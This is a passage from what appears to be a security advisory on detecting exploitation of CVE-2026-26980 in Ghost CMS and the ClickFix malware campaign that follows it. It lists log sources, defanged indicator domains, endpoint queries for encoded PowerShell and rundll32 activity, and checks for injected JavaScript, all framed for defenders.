ClickFix attacks. Detection Strategies for CVE-2026-26980 Detecting CVE-2026-26980 exploitation and subsequent ClickFix attacks requires a multi-layered approach, focusing on web application logs, network traffic, and endpoint activity. Web Application and Server Logs Monitor Ghost CMS access logs for unusual requests to the Content API, especially those indicating SQL injection attempts or unauthorized access patterns. Examine Ghost CMS audit logs for unauthorized modifications to articles or templates, specifically looking for bulk changes or insertions of new script tags. Analyze HTTP server access logs for requests originating from potentially compromised Ghost instances to external domains like clo4shara[.]xyz or web-telegram[.]ug. Look for POST requests containing Base64-encoded commands or unusual parameters that might indicate an attacker trying to use the Admin API. Network Indicators (IOCs) Domains: clo4shara[.]xyz (Malicious JavaScript loader and traffic distribution) web-telegram[.]ug (Command and Control for the Grape desktop client) IP Addresses: Monitor DNS queries and network connections to IP addresses associated with these domains. Traffic Patterns: Look for outbound HTTP/HTTPS connections from internal networks to the listed malicious domains, especially from user workstations. Identify traffic associated with unexpected file downloads (ZIP archives, DLLs, executables). Proxy/Firewall Logs: Configure firewalls and proxies to block or alert on connections to the identified malicious domains. Endpoint Detection and Response (EDR) / SIEM Queries Process Execution Anomalies: Detect instances of cmd.exe or powershell.exe being launched with Base64-encoded commands, especially with browser processes. Monitor for rundll32.exe executing unusual DLL files from non-standard directories or external network locations. Look for the creation and execution of .bat or .ps1 scripts in temporary directories following web browser activity. File System Activity: Monitor for new ZIP archives, DLLs, or executables created in user download directories or temporary folders that are not associated with legitimate software installations. Identify the installation of the "Grape desktop client" or "PuTTY client" via unexpected installation paths or without user initiation, particularly if they show unusual network activity. Registry/Persistence: Detect new or modified registry keys related to startup items, scheduled tasks, or services designed for persistence for the modified Grape desktop client or other malware. Network Connections from Endpoints: Alert on network connections from powershell.exe, rundll32.exe, or the Grape desktop client to the C2 domain web-telegram[.]ug. Content Monitoring and Web Scanners Regularly scan Ghost CMS instances for injected JavaScript code, especially at the bottom of article pages. Look for